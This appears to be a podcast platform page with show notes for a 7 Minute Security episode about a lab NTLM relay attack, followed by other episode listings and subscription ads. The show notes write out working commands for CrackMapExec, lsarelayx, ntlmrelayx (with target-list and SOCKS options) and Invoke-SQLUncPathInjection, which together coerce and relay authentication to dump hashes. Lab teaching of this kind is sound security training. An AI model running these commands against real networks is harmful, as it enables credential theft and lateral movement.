7 Minute Security5 Mai 2023

7MS #570: How to Build a Vulnerable Pentest Lab - Part 4

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

Then we setup lsarelayx in one window:

lsarelayx --host=localhost

And in a second window we ran ntlmrelayx.py:

python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

Finally, in a third window we triggered authentication from the vulnerable SQL server:

Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

Boom! Watch the local usernames and hashes fall out of the victim system.

We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

victim1 victim2 victim3

Then we tweaked the ntlmrelayx command slightly:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

Interestingly(?) only victim2 was attacked.

Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

Oppdag Premium

Prøv 14 dager gratis

Kjøp Premium

Episoder(714)

7MS #714: Tales of Pentest Pwnage – Part 81

Hello friends! We're back with a fun tale of internal network pentest pwnage. This one highlights how AI can be used (with some guardrails!) to automate the boring stuff – and even help you pick par...

20 Mar 22min

7MS #713: How to Secure Your Community – Part 3

Hello friends, in today's edition of How to Secure Your Community, I give a brief recap of part 1 and part 2, and then dive into some cool phone shortcuts you can setup so that with a single tap, you ...

13 Mar 31min

7MS #712: How to Secure Your Community - Part 2

Hello friends. Today's episode piggybacks off of last week's discussion of Operation Metro Surge and how it has affected the state of Minnesota. I also highly encourage you to read this Rolling Ston...

6 Mar 37min

7MS #711: How to Secure Your Community

Hello friends, it's good to be back with you. I took a podcast hiatus in January to focus on helping communities affected by Operation Metro Surge. Today I share how my family and community has been...

27 Feb 51min

7MS #710: I'm Taking a Break

Hi friends, I'm going to be taking a break from producing podcast episodes, as well as content over at 7MinSec.club. It's a temporary break, so please don't unsubscribe, unfollow, etc. I need some e...

17 Jan 4min

7MS #709: Second Impressions of Twingate

Hey friends, in episode #649 I gave you my first impressions of Twingate. It's been a minute, so I thought I'd revisit Twingate (specifically this awesome Twingate LXC) and talk about how we're using...

10 Jan 20min

7MS #708: Tales of Pentest Fail – Part 6

After sharing a recent story about how a phishing campaign went south, I heard feedback from a lot of you. You either commiserated with my story, told me I wussed out, and/or had a difficult story of...

2 Jan 25min

7MS #707: Our New Pentest Course Has Launched!

Today we're thrilled to announce the launch of LPLITE:GOAD (Light Pentest Live Interactive Training Experience: Game of Active Directory). The first class is coming up Tuesday, January 27 – Thursday, ...

26 Des 202514min

Reklamefrie Premium-podkaster

Hør populære podkaster som Storefri med Mikkel og Herman, Ida med hjertet i hånden, Krimpodden og mye mye mer

Skap din egen podkastboble

I appen skaper du ditt eget bibliotek med favoritter, og vi gir deg også anbefalinger til podkaster du ikke kan gå glipp av.

Prøv 14 dager gratis

Dersom du er ny Podme-bruker får du 14 dager gratis prøveperiode når du oppretter abonnement

Premium

99 kr/ måned

Tilgang til alle våre Premium-podkaster
Alle podkaster fra VG, Aftenposten, BT og SA
Reklamefritt Premium-innhold
Ingen bindingstid. Avslutt når du ønsker

Prøv 14 dager gratis

Premium

129 kr/ måned

Tilgang til alle Premium-podkaster
Alle podkaster fra VG, Aftenposten, BT og SA
Reklamefritt Premium-innhold
Ingen bindingstid. Avslutt når du ønsker
En Ekstra bruker

Prøv 14 dager gratis

Populært innen Politikk og nyheter

Historiene og stemmene du vil høre

Ubegrenset tilgang til alle dine favorittpodkaster og lydbøker

Les mer